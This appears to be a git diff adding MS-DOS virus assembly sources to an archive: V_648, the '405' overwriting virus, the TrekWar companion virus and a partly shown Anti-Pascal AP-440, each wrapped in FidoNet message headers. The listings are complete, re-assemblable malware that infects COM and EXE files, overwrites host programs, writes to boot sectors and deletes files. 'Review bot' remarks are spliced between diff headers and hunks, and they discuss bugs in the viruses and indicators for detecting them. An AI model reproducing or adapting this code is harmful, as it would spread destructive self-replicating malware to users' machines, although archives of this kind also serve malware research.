+do_write: + call dos_write ;Write to file handle + +oldtime: + mov dx,[bp-date] ;Restore file date + mov cx,[bp-time] ; and time + or cl,11111b ;Set seconds to 62 (the virus' marker) + + mov ax,5701 ;Set file date & time + int 21 + mov ah,3E ;Close file handle + int 21 + +oldattr: + mov ax,4301 ;Set file attributes + mov cx,[bp-attrib] ;They were saved in attrib + and cx,3F + lea dx,[bp-fname] + int 21 ;Do it + jmp olddta ;And exit + +lseek: + mov ax,4200 ;LSEEK from the beginning of the file +clr_dx_cx_dos: + xor dx,dx ;From the very beginning +clr_cx_dos: + xor cx,cx ;Auxiliary entry point + db 3Dh ;Trick +dos_write: + mov ah,40 ;Write to file handle +dos_rw: + int 21 + jc dos_ret ;Exit on error + cmp ax,cx ;Set CF if AX < CX +dos_ret: + ret + +handler: ;Critical error handler + mov al,0 ;Just ignore the error + iret ; and return + + db 0E9 ;The JMP opcode + +endcode label byte + +code ends + end start + +;-+- GoldED/386 2.50.B1016+ +; + Origin: The PRO-Point on a 
PRO-BBS and a PRO-*.* ...Ciaro?... (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/t Suppress messages if successful assembly +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir53.asm b/MSDOS/Virus.MSDOS.Unknown.vir53.asm new file mode 100644 index 00000000..e70ebd8a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir53.asm 
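Review bot: The size filter under `checkfile` (`sub word ptr [bp-fsize],10d` / `cmp [bp-fsize],64000d-10d+1`) only examines the low word of the 32-bit size field in the DTA, so the comment `;Is 10 <= file_size <= 64,000 bytes?` holds only modulo 65536 - a *.COM match larger than 64K whose low word falls in range still reaches `process`. I would amend the comment to `;Low word only: size is compared modulo 64K` so readers do not rely on the stated bound. It is also worth noting at `bad_jmp` that the destructive branch taken when `and dh,111b` is zero writes the far jump over the host's first five bytes and then falls through `do_write` into `oldtime`, which still stamps the 62-second marker, so the destroyed file is skipped on later runs as if it were infected.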
@@ -0,0 +1,340 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 43 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:16 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : V_648.DIS +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Clif Jessop, 2:283/718 (06 Nov 94 17:50) +;* To : Edwin Cleton +;* Subj : V_648.DIS +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Clif.Jessop@f718.n283.z2.fidonet.org +RET_NEAR_POP MACRO X +DB 0C2H +DW X +ENDM + +cseg segment + assume cs:cseg + org $+100h + +L0100: JMP L5BAA + + org 5baah + +L5BAA: PUSH CX + MOV DX,OFFSET L5DA3 + + CLD ;odtworzenie zmienionego kawalka + MOV SI,DX + ADD SI,0AH + MOV DI,OFFSET L0100 + MOV CX,3 + REPZ MOVSB + + MOV SI,DX ;baza obszaru danych + + MOV AH,30H ;Get MS-DOS version number + INT 21H + CMP AL,0 ;Major version number + JNZ L5BCA + JMP L5D91 + +L5BCA: PUSH ES + MOV AH,2FH ;Get DTA + INT 21H + MOV DS:[SI],BX ;schowanie starego DTA + MOV DS:[SI+2],ES + POP ES + + MOV DX,5FH ;nowe DTA + NOP + ADD DX,SI + MOV AH,1AH ;Set DTA + INT 21H + + PUSH ES ;<- szukanie PATH= + PUSH SI + MOV ES,DS:2CH ;Environment + MOV DI,0 ;adres w environmencie +L5BEB: POP SI + PUSH SI + ADD SI,1AH ;wzorzec PATH= + LODSB + MOV CX,8000h + REPNZ SCASB + MOV CX,4 +L5BFA: LODSB + SCASB + JNZ L5BEB ;-> to nie to + LOOP L5BFA + POP SI + POP ES + + MOV ds:[SI+16H],DI ;adres zawartosci path'a + MOV DI,SI + ADD DI,1FH ;obszar roboczy +; PATCH83 + MOV BX,SI + ADD SI,1FH ;obszar roboczy + MOV DI,SI + JMP SHORT L5C50 + +;<------zmiana katalogu +L5C16: CMP WORD PTR ds:[SI+16H],0 ;adres zawartosci path'a + JNZ L5C20 + JMP L5D83 + +L5C20: PUSH DS + PUSH SI + MOV DS,ES:2CH ;segment environmentu + MOV DI,SI + MOV SI,ES:[DI+16H] ;adres zawartosci path'a + ADD DI,1FH +; PATCH83 +L5C32: LODSB + CMP AL,';' ;czy koniec pozycji ? 
+ JZ L5C41 + CMP AL,0 ;koniec environmentu + JZ L5C3E ;-> tak + STOSB + JMP SHORT L5C32 + +L5C3E: MOV SI,0 ;znacznik, ze wiecej juz nie ma +L5C41: POP BX + POP DS + MOV ds:[BX+16H],SI ;schowanie nowego pointera + CMP BYTE PTR [DI-1],'\' ;czy zakonczone back-slashem + JZ L5C50 ;-> tak + MOV AL,'\' ;uzupelnienie + STOSB + +L5C50: MOV ds:[BX+18H],DI ;adres poczatku nazwy zbioru w path + MOV SI,BX + ADD SI,10H ;'*.com' + MOV CX,6 + REPZ MOVSB + MOV SI,BX + MOV AH,4EH ;Find First File + MOV DX,1FH ;pointer na pathname + NOP + ADD DX,SI + MOV CX,3 ;Attrributes to match ro+hidden+zwykle + INT 21H + JMP SHORT L5C74 + +L5C70: MOV AH,4FH ;find next + INT 21H +L5C74: JNB L5C78 ;-> znaleziono + JMP SHORT L5C16 ;-> na nastepny katalog + +L5C78: MOV AX,ds:[SI+75H] ;Time file was last written + AND AL,1FH ;czy juz zawirusowany ? + CMP AL,1FH + JZ L5C70 ;-> tak, odpuszczamy takim + CMP WORD PTR ds:[SI+79H],0FA00h ;low word of file size + JA L5C70 ;-> odpuszczamy zbyt duzym + CMP WORD PTR ds:[SI+79H],0AH + JB L5C70 ;-> odpuszczamy zbyt malym + MOV DI,ds:[SI+18H] ;adres nazwy zbioru w path + + PUSH SI + ADD SI,7DH ;nazwa znalezionego zbioru +L5C9A: LODSB + STOSB + CMP AL,0 + JNZ L5C9A + POP SI + + MOV AX,4300h ;Get file attributes + MOV DX,1FH ;pathname + NOP + ADD DX,SI + INT 21H + MOV ds:[SI+8],CX ;Attribute byte + + MOV AX,4301h ;Set attributes + AND CX,0FFFEh ;-read/only + MOV DX,1FH ;pathname + NOP + ADD DX,SI + INT 21H + + MOV AX,3D02h ;Open file/write + MOV DX,1FH ;pathname + NOP + ADD DX,SI + INT 21H + JNB L5CCF + JMP L5D74 + +L5CCF: MOV BX,AX ;<- open O.K. + MOV AX,5700h ;Get date & time of file + INT 21H + MOV ds:[SI+4],CX ;schowanie daty ostatniej modyfikacji + MOV ds:[SI+6],DX + + MOV AH,2CH ;Get Time + INT 21H + + AND DH,7 ;ktory wariant ? 
+ JNZ L5CF7 ;-> rozmnozenie + + ;<- destrukcja + MOV AH,40H ;Write handle + MOV CX,5 ;bytes + MOV DX,SI ;pointer to buffer + ADD DX,8AH + INT 21H + JMP SHORT L5D5B + + NOP ;<- rozmnozenie +L5CF7: MOV AH,3FH ;Read handle + MOV CX,3 ;bytes + MOV DX,0AH ;buffer offset + NOP + ADD DX,SI + INT 21H + JB L5D5B ;-> blad + CMP AX,3 ;bytes read + JNZ L5D5B ;zbyt malo + + MOV AX,4202h ;Move file pointer end+offset + MOV CX,0 ;offset + MOV DX,0 ;offset + INT 21H + JB L5D5B ;-> blad + MOV CX,AX ;adres konca + SUB AX,3 ;minus dlugosc jump'u + MOV ds:[SI+0EH],AX ;nowe 3 pierwsze bajty + ADD CX,02F9h + MOV DI,SI + SUB DI,01F7h + MOV [DI],CX ;<- adres zmiennych + MOV AH,40H ;write handle + MOV CX,0288h ;dlugosc wirusa + MOV DX,SI ;poczatek wirusa + SUB DX,01F9h + INT 21H + JB L5D5B ;-> blad + + CMP AX,0288h ;czy wszystko zapisano + JNZ L5D5B ;-> nie + MOV AX,4200 ;Move file pointer poczatek + MOV CX,0 ;offset + MOV DX,0 ;offset + INT 21H + JB L5D5B ;-> blad + + MOV AH,40H ;write + MOV CX,3 ;dlugosc + MOV DX,SI ;buffer + ADD DX,0DH + INT 21H +L5D5B: MOV DX,ds:[SI+6] ;koniec obrobki zbioru + MOV CX,ds:[SI+4] + AND CX,0FFE0h ;znacznik zawirusowania - czas + OR CX,1FH + MOV AX,5701h ;Set Date/Time of File + INT 21H + MOV AH,3EH ;Close handle + INT 21H + ;<- blad otwarcia zbioru +L5D74: MOV AX,4301h ;Set File attributes + MOV CX,ds:[SI+8] + MOV DX,1FH + NOP + ADD DX,SI + INT 21H + +L5D83: PUSH DS + MOV AH,1AH ;Set DTA + MOV DX,ds:[SI+0] ;poprzednia wartosc + MOV DS,ds:[SI+2] ;poprzednia wartosc + INT 21H + POP DS + +L5D91: POP CX ;<- gdy dos < 2.0 + XOR AX,AX + XOR BX,BX + XOR DX,DX + XOR SI,SI + MOV DI,0100h ;adres restartu + PUSH DI + XOR DI,DI + RET_NEAR_POP 0FFFFH + +L5DA3 label word ;<- poczatek zmiennych programu +x0000 equ $-l5da3 + dw 0080h,440Ch ;adres DTA oryginalny +x0004 equ $-l5da3 + Dw 6d60H ;Time file last written +x0006 equ $-l5da3 + Dw 0a67H ;Date file last written +x0008 dw 0020h ;file attribute - oryginal +x000a equ $-l5da3 + db 0E9h,0ADh,0Bh ;schowana poprzednia 
zawartosc [100h] +x000d equ $-l5da3 + db 0E9h,0A7h,5ah ;zapisywane do zbioru +x0010 equ $-l5da3 + DB '*.COM',0 ;wzorzec do szukania +x0016 equ $-l5da3 + dw 001CH ;adres path= w environmencie +x0018b equ $-l5da3 + dw 65F3H ;adres nazwy zbioru w path x001f +x001a equ $-l5da3 + db 'PATH=' ;szukane w environmencie +;--------------------------------------- +x001f equ $-l5da3 + db 'COMMAND.COM',0 ;nazwa obrabianego zbioru + db 'OM',0 + db 'M',0 + db 'COM',0 + db 'OM',0 + db ' ' + db ' ' + +;---------------------------------------- +x005f equ $-l5da3 ;<- nowe DTA + db 1,'????????COM',3,2 ;reserved area + db ?,? + DB 0,0,0,0,0,0,0 + db 20h ;attribute found +x0075 equ $-l5da3 + dw 6d60h ;Time file was last written + dw 0a67h ;date file was last written +x0079 equ $-l5da3 + Dw 5AAAH ;Low word of file size + Dw 0 ;High word of file size +x007d equ $-l5da3 + db 'COMMAND.COM',0,0 ;name and extension +;---------------------------------------- + +x008a equ $-l5da3 ;zapisywane do zbioru + db 0EAH,0F0H,0FFH,0,0F0H ;jmp 0f000:0fff0h + +cseg ENDS + + END L0100 + +;-+- DinoMail v.1.0 Alpha +; + Origin: Hans' Point with DOSBoss West, Amsterdam (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/Txx Specify output file type +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir54.asm b/MSDOS/Virus.MSDOS.Unknown.vir54.asm new file mode 100644 index 00000000..32709062 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir54.asm 
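Review bot: At the `;Move file pointer poczatek` step the immediate is written `MOV AX,4200` with no `h` suffix, while every other DOS call in this listing (`4202h`, `4300h`, `4301h`, `3D02h`, `5700h`, `5701h`) carries one and there is no `.radix` directive, so MASM assembles a decimal 4200 and a re-assembly of this file will not be byte-identical to the original sample. A caveat such as `;NOTE: radix inconsistency - verify this immediate against the original bytes before treating a re-assembly as the reference` would stop readers from trusting the rebuilt binary. The comments are also in Polish throughout; for consistency with the rest of the corpus they should be translated, e.g. `;odtworzenie zmienionego kawalka` -> `;restore the overwritten first bytes` and `;znacznik zawirusowania - czas` -> `;infection marker in the time stamp`.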
@@ -0,0 +1,238 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 44 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:16 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : 405_B.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Doug Bryce, 2:283/718 (06 Nov 94 17:51) +;* To : Mike Nisbett +;* Subj : 405_B.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Doug.Bryce@f718.n283.z2.fidonet.org + title The '405' virus + page 65,132 +; ͻ +; British Computer Virus Research Centre +; 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England +; Telephone: Domestic 0273-26105, International +44-273-26105 +; +; The '405' Virus +; Disassembled by Joe Hirst, March 1989 +; +; Copyright (c) Joe Hirst 1989. +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + + ; The virus overwrites the first 405 bytes of a COM file. If the + ; length of the COM file is less than this, the length is increased + ; to 405 bytes. + + ; The disassembly has been tested by re-assembly using MASM 5.0. + +BUFFER SEGMENT AT 0 + + ORG 295H +DW0295 DW ? +DB0297 DB ? + + ORG 0E000H +DWE000 DW ? ; Read buffer area + + ORG 0E195H +DWE195 DW ? 
; Program after virus + +BUFFER ENDS + +CODE SEGMENT BYTE PUBLIC 'CODE' + ASSUME CS:CODE,DS:NOTHING,ES:BUFFER + +VIRLEN EQU OFFSET ENDADR-START + ORG 100H + +START: XCHG SI,AX + ADD [BX+SI],AL + SAHF + ADD [BX+SI],AL + NOP + + MOV AX,0 ; Clear register + MOV ES:DB0249,AL ; Set current disk to default + MOV ES:DB024B,AL ; Set pathname store to zero + MOV ES:DB028B,AL ; Set number of drives to zero + PUSH AX + MOV AH,19H ; Get current disk function + INT 21H ; DOS service + MOV ES:DB0249,AL ; Save current disk + MOV AH,47H ; Get current directory function + ADD AL,1 ; Next drive (A) + PUSH AX + MOV DL,AL ; Drive A + LEA SI,DB024B ; Pathname store + INT 21H ; DOS service + POP AX + MOV AH,0EH ; Select disk function + SUB AL,1 ; Convert drive for select function + MOV DL,AL ; Move drive + INT 21H ; DOS service + MOV ES:DB028B,AL ; Save number of drives +BP0139: MOV AL,ES:DB0249 ; Get current disk + CMP AL,0 ; Is drive A? + JNZ BP0152 ; Branch if not + MOV AH,0EH ; Select disk function + MOV DL,2 ; Change drive to B + INT 21H ; DOS service + MOV AH,19H ; Get current disk function + INT 21H ; DOS service + MOV ES:DB024A,AL ; Save new current drive + JMP BP0179 + +BP0152: CMP AL,1 ; Is drive B? + JNZ BP0167 ; Branch if not + MOV AH,0EH ; Select disk function + MOV DL,2 ; Change drive to C + INT 21H ; DOS service + MOV AH,19H ; Get current disk function + INT 21H ; DOS service + MOV ES:DB024A,AL ; Save new current drive + JMP BP0179 + +BP0167: CMP AL,2 ; Is drive C? 
+ JNZ BP0179 ; Branch if not + MOV AH,0EH ; Select disk function + MOV DL,0 ; Change drive to A + INT 21H ; DOS service + MOV AH,19H ; Get current disk function + INT 21H ; DOS service + MOV ES:DB024A,AL ; Save new current drive +BP0179: MOV AH,4EH ; Find first file function + MOV CX,1 ; Find read-only files, not system + LEA DX,DB028C ; Path '*.COM' + INT 21H ; DOS service + JB BP0189 ; Branch if error + JMP BP01A9 ; Process COM file + +BP0189: MOV AH,3BH ; Change current directory function + LEA DX,DB0297 ; Directory pathname (this is past the end) + INT 21H ; DOS service + MOV AH,4EH ; Find first file function + MOV CX,0011H ; Find directory and read-only + LEA DX,DB0292 ; Path '*' + INT 21H ; DOS service + JB BP0139 ; Branch if error + JMP BP0179 ; Find a COM file + +BP01A0: MOV AH,4FH ; Find next file function + INT 21H ; DOS service + JB BP0189 ; Branch if error + JMP BP01A9 ; Process COM file + + ; Process COM file + +BP01A9: MOV AH,3DH ; Open handle function + MOV AL,2 ; R/W access + MOV DX,009EH ; File pathname + INT 21H ; DOS service + MOV BX,AX ; Move handle + MOV AH,3FH ; Read handle function + MOV CX,VIRLEN ; Length of virus + NOP + MOV DX,OFFSET DWE000 ; Read it in way down there + NOP + INT 21H ; DOS service + MOV AH,3EH ; Close handle function + INT 21H ; DOS service + MOV BX,DWE000 ; Get first word of COM file + CMP BX,9600H ; Is it infected? 
(should be 0096H) + JZ BP01A0 ; Yes, find another one + MOV AH,43H ; \ Get file attributes function + MOV AL,0 ; / + MOV DX,009EH ; File pathname + INT 21H ; DOS service + MOV AH,43H ; \ Set file attributes function + MOV AL,1 ; / + AND CX,00FEH ; Set off read only attribute + INT 21H ; DOS service + MOV AH,3DH ; Open handle function + MOV AL,2 ; R/W mode + MOV DX,009EH ; File pathname + INT 21H ; DOS service + MOV BX,AX ; Move handle + MOV AH,57H ; \ Get file date & time function + MOV AL,0 ; / + INT 21H ; DOS service + PUSH CX + PUSH DX + ASSUME ES:NOTHING + MOV DX,CS:DW0295 ; Get word after virus here + MOV CS:DWE195,DX ; Move to same position in prog + MOV DX,CS:DWE000+1 ; Get displacement from initial jump + LEA CX,DB0294-100H ; Length of virus minus one + SUB DX,CX + MOV CS:DW0295,DX ; Store in word after virus + MOV AH,40H ; Write handle function + MOV CX,VIRLEN ; Length of virus + NOP + LEA DX,START ; Beginning of virus + INT 21H ; DOS service + MOV AH,57H ; \ Set file date & time function + MOV AL,1 ; / + POP DX + POP CX + INT 21H ; DOS service + MOV AH,3EH ; Close handle function + INT 21H ; DOS service + MOV DX,CS:DWE195 ; Get word after virus + MOV CS:DW0295,DX ; Move to same position here + JMP BP0234 + +BP0234: MOV AH,0EH ; Select disk function + MOV DL,CS:DB0249 ; Get current disk + INT 21H ; DOS service + MOV AH,3BH ; Change current directory function + LEA DX,DB024A ; Address of path - this is incorrect + INT 21H ; DOS service + MOV AH,0 ; Terminate program function + INT 21H ; DOS service + +DB0249 DB 2 ; Current disk +DB024A DB 0 ; New current drive + + ; There should be an extra byte at this point containing '\' + ; for use by the change directory function - this is why that + ; function is pointing at the previous field + +DB024B DB 'TEST', 3CH DUP (0) +DB028B DB 0DH ; Number of drives +DB028C DB '*.COM', 0 +DB0292 DB '*', 0 +DB0294 DB 0E9H + +ENDADR EQU $ + +CODE ENDS + + END START + +;-+- FidoPCB v1.4 [NR] +; + Origin: FidoNet * Mathieu 
Notris * Brussels-Belgium-Europe (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/uxxxx Set version emulation, version xxxx +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir55.asm b/MSDOS/Virus.MSDOS.Unknown.vir55.asm new file mode 100644 index 00000000..7abf77c3 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir55.asm 
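Review bot: The `Process COM file` path at BP01A9 opens the file (`MOV AH,3DH ... INT 21H / MOV BX,AX`) with no carry check, and the `MOV AH,3FH` read result in AX is not compared with VIRLEN before `MOV BX,DWE000` inspects the first word; a failed open leaves a DOS error code in BX as the handle, and a short read leaves stale buffer bytes in the infection check. The existing `(should be 0096H)` remark on `CMP BX,9600H` already records that the marker test cannot match a file the virus itself wrote (its first bytes are 96h 00h), so these two gaps compound it: every *.COM found is rewritten on every run. Since this is a verbatim 1989 disassembly, I would add comments rather than change code, e.g. `; No CF check: on failure AX holds a DOS error code` after the open and `; AX (bytes read) is not validated` after the read.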
@@ -0,0 +1,213 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 45 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:16 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : TREKWAR.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Mike Salvino, 2:283/718 (06 Nov 94 17:51) +;* To : Daniel Hendry +;* Subj : TREKWAR.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Mike.Salvino@f718.n283.z2.fidonet.org +;TrekWar +;Ŀ +; Assembly Source Listing for TrekWar Companion Virus +; Copyright (c) 1993 T.R.E.K. All Rights Reserved. :) +;Ĵ +; The TrekWar is a simple modification of the Clonewar V2 companion virus; +; for all you trekkers out there... For those of you who, heaven forbid, do +; not know what the words below mean, they are the words to the old series +; opening music of Star Trek... +; + +CSEG SEGMENT + ASSUME CS:CSEG,DS:NOTHING + + ORG 100H + +START: + jmp VIR_BEGIN ;lets get moving... + + db "",13,10 + db "",13,10 + db "Beyond",13,10 ;blah blah blah + db "The rim of the star-light",13,10 + db "My love",13,10 + db "Is wand'ring in star-flight",13,10 + db "I know",13,10 + db "He'll find in star-clustered reaches",13,10 + db "Love",13,10 + db "Strange love a star woman teaches.",13,10 + db "I know",13,10 + db "His journey ends never",13,10 + db "His star trek",13,10 + db "Will go on forever.",13,10 + db "But tell him",13,10 + db "While he wanders his starry sea",13,10 + db "Remember, remember me." + db "",13,10 + db "",13,10 + + db "[TrekWar] " ;what the heck, its only a few bytes!? +WILDCARD DB "*.EXE",0 +FILE_EXT DB "COM",0 +FILE_FOUND DB 12 DUP(' '), 0 +FILE_CREATE DB 12 DUP(' '), 0 +SEARCH_ATTRIB DW 17H +NUM_INFECT DW 0 + + +My_Cmd: +CMD_LEN DB 13 +FILE_CLONE DB 12 DUP (' '), 0 + +; +; Read all the directory filenames and store as records in buffer. 
+; + +Vir_begin: + + mov sp,offset STACK_HERE ;move stack down + mov bx,sp + add bx,15 + mov cl,4 + shr bx,cl + mov ah,4ah ;deallocate rest of memory + int 21h + + mov di,OFFSET FILE_CLONE ;Point to buffer. + mov si,OFFSET FILE_FOUND + mov cx,12 + rep movsb + +Read_dir: mov dx,OFFSET WILDCARD ;file mask for directory search + mov cx,SEARCH_ATTRIB + + mov ah,4Eh ;find first matching file + int 21h + + jc EXIT ;If empty directory, exit + +; + +Store_name: + + mov di,OFFSET FILE_FOUND ;Point to buffer. + mov si,158 ;stow the file found in buffer + mov cx,12 + rep movsb + + mov di,OFFSET FILE_CREATE ;Point to buffer. + mov si,158 + mov cx,12 + rep movsb + + cld + mov di,OFFSET FILE_CREATE + mov al,'.' + mov cx,9 + repne scasb ;find the '.' + + mov si,OFFSET FILE_EXT + mov cx,3 + rep movsb ;replace the .EXE with .COM + ;from buffer + +; + +Check_file: ;does the file exist? + mov dx,OFFSET FILE_CREATE + xor cx,cx + mov ax,3d00h ;Open file, read only + int 21h + jnc find_next + +; +Infect_file: ;create companion routine + + mov dx,OFFSET FILE_CREATE ;contains name of "companion" + xor cx,cx + mov ah,3ch ;construct file + int 21h + jc EXIT + + ;Write virus to companion file + xchg bx,ax + mov cx,(OFFSET END_OF_CODE - OFFSET START) ;virus length + mov dx,OFFSET START + mov ah,40h ;write to file function + int 21h ;do it + + ;Close file + mov ah,3eh ;assumes bx still has file handle + int 21h + + ;Change attributes + mov dx,OFFSET FILE_CREATE ;of created file to + mov cx,3 ;(1) read only and (2) hidden + mov ax,4301h + int 21h + jmp prepare_command + +; +;...findnext... +; +find_next: + mov ah, 4fh ;find next... 
+ int 21h + jmp store_name +; +Prepare_command: + + cld + mov di,OFFSET FILE_CLONE + mov al,0 + mov cx,12 + repne scasb ;find the end of string \0 + + mov al,0Dh ; + stosb ;replace \0 with a + + mov ax,12 ;store length of the command + sub ax,cx + mov CMD_LEN, al + +; + +Exit: + ;Run the original program + mov si, OFFSET MY_CMD + int 2Eh ;Pass command to command + ;interpreter for execution + mov ax,4C00H ;Exit to DOS + int 21h + + +END_OF_CODE = $ + +STACK_HERE EQU END_OF_CODE + 512 + +CSEG ENDS + END START + +;-+- FMail 0.96 +; + Origin: ViRUS PaRk BbS >916< 387-6159 24HouRs (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/zi,/zd,/zn Debug info: zi=full, zd=line numbers only, zn=none +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir56.asm b/MSDOS/Virus.MSDOS.Unknown.vir56.asm new file mode 100644 index 00000000..b20e1976 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir56.asm 
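Review bot: The new file carries no archive header of its own — the first twenty lines are the FidoNet message envelope (Msg/From/To/RFC-Path) and the tail is mailer residue (`;-+- FMail 0.96`, the `;/zi,/zd,/zn Debug info` and `Aidstest Null: /Kill` taglines), so a reader cannot separate provenance from sample without reading the code. A short leading comment would help analysts, e.g. `; Archived sample: TrekWar companion virus (Clonewar V2 derivative) as posted to PVT.VIRII; FidoNet envelope and mailer taglines retained verbatim.` The listing itself supplies the useful indicators: it creates a `.COM` with the same basename as each `.EXE` found (`WILDCARD DB "*.EXE",0`, extension swapped in from `FILE_EXT`), sets it hidden + read-only (`mov cx,3` / `mov ax,4301h`) and runs the original through `int 2Eh`, so hidden read-only `.COM` files shadowing `.EXE` files and the `[TrekWar] ` string are what to look for on disk. The same FidoNet envelope opens vir56, vir57, vir58, vir61, vir62 and vir63 and the same tagline block closes vir56 through vir62, so one header convention should be applied to all of them.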
@@ -0,0 +1,316 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 46 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:16 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : AP_440.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Fred Lee, 2:283/718 (06 Nov 94 17:54) +;* To : Mike Nisbett +;* Subj : AP_440.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Fred.Lee@f718.n283.z2.fidonet.org + page ,132 + name AP440 + title The 'Anti-Pascal' virus, version AP-440 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Anti-Pascal' Virus, version AP-440 +; Disassembled by Vesselin Bontchev, July 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +v_const = 2042d + +start: + jmp v_entry + db 0CA ; Virus signature + + db (2048d - 9) dup (90) + + mov ax,4C00 + int 21 + +v_start label byte +first4 db 0E9, 0F8, 7, 90 +allcom db '*.COM', 0 + +mydta label byte +reserve db 15 dup (?) +attrib db ? +time dw ? +date dw ? +fsize dd ? +namez db 14d dup (?) + +allp db 0, '????????P??' +allbak db 0, '????????BAK' +maxdrv db ? +sign db 'ICS 89' + +v_entry: + push ax ; Save AX & DX + push dx + + mov ah,19 ; Get the default drive + int 21 + push ax ; Save it on stack + mov ah,0E ; Set it as default (?!) 
+ mov dl,al + int 21 ; Do it + + call self ; Determine the virus' start address +self: + pop si + sub si,offset self-v_const + +; Save the number of logical drives in the system: + + mov byte ptr [si+offset maxdrv-v_const],al + +; Restore the first 4 bytes of the infected program: + + mov ax,[si+offset first4-v_const] + mov word ptr ds:[offset start],ax + mov ax,[si+offset first4+2-v_const] + mov word ptr ds:[offset start+2],ax + + mov ah,1A ; Set new DTA + lea dx,[si+offset mydta-v_const] + int 21 ; Do it + + pop ax ; Restore current drive in AL + push ax ; Keep it on stack + + call inf_drive ; Proceed with the current drive + + xor al,al ; For all logical drives in the system +drv_lp: + call inf_drive ; Proceed with drive + jbe drv_lp ; Loop until no more drives + + pop ax ; Restore the saved current drive + mov ah,0E ; Set it as current drive + mov dl,al + int 21 ; Do it + + mov dx,80 ; Restore original DTA + mov ah,1A + int 21 ; Do it + + mov si,offset start + pop dx ; Restore DX & AX + pop ax + jmp si ; Run the original program + +inf_drive: + push ax ; Save the selected drive number on stack + mov ah,0E ; Select that drive + mov dl,al + int 21 ; Do ti + pop ax ; Restore AX + + push ax ; Save the registers used + push bx + push cx + push si ; Save SI + + mov cx,1 ; Read the boot sector of the drive specified + xor dx,dx + lea bx,[si+offset v_end-v_const] + push ax ; Save AX + push bx ; Save BX, CX & DX also + push cx + push dx + int 25 ; Do read + pop dx ; Clear the stack + pop dx ; Restore saved DX, CX & BX + pop cx + pop bx + jc bad_drv ; Exit on error + + inc byte ptr [bx] ; Increment the first byte (?!) + cmp byte ptr [bx+1],6F ; Second byte == 111 (?!) 
+ jne wr_drive ; Write the new values if not + +bad_drv: + pop ax ; Restore AX + pop si ; Restore SI +drv_xit: + pop cx ; Restore used registers + pop bx + pop ax + + inc al ; Go to next drive number + cmp al,[si+offset maxdrv-v_const] ; See if there are more drives + ret ; Exit + +wr_drive: + pop ax ; Restore drive number in AL + int 26 ; Do write + pop ax ; Clear the stack + pop si ; Restore Si + jc drv_xit ; Exit on error + +; Find first COM file on the current directory of the selected drive: + + mov ah,4E + xor cx,cx ; Normal files only + lea dx,[si+offset allcom-v_const] ; File mask +next: + int 21 ; Do find + jc no_more ; Quit search if no more such files + lea dx,[si+offset namez-v_const] ; Get file name found + call infect ; Infect that file + mov ah,4F ; Prepare for FindNext + jc next ; If infection not successful, go to next file + jmp drv_xit ; Otherwise quit + +no_more: + lea di,[si+offset v_end-v_const] + cmp byte ptr [di],'Z' + jb drv_xit + + mov ah,13 ; Delete all *.P* files in that dir 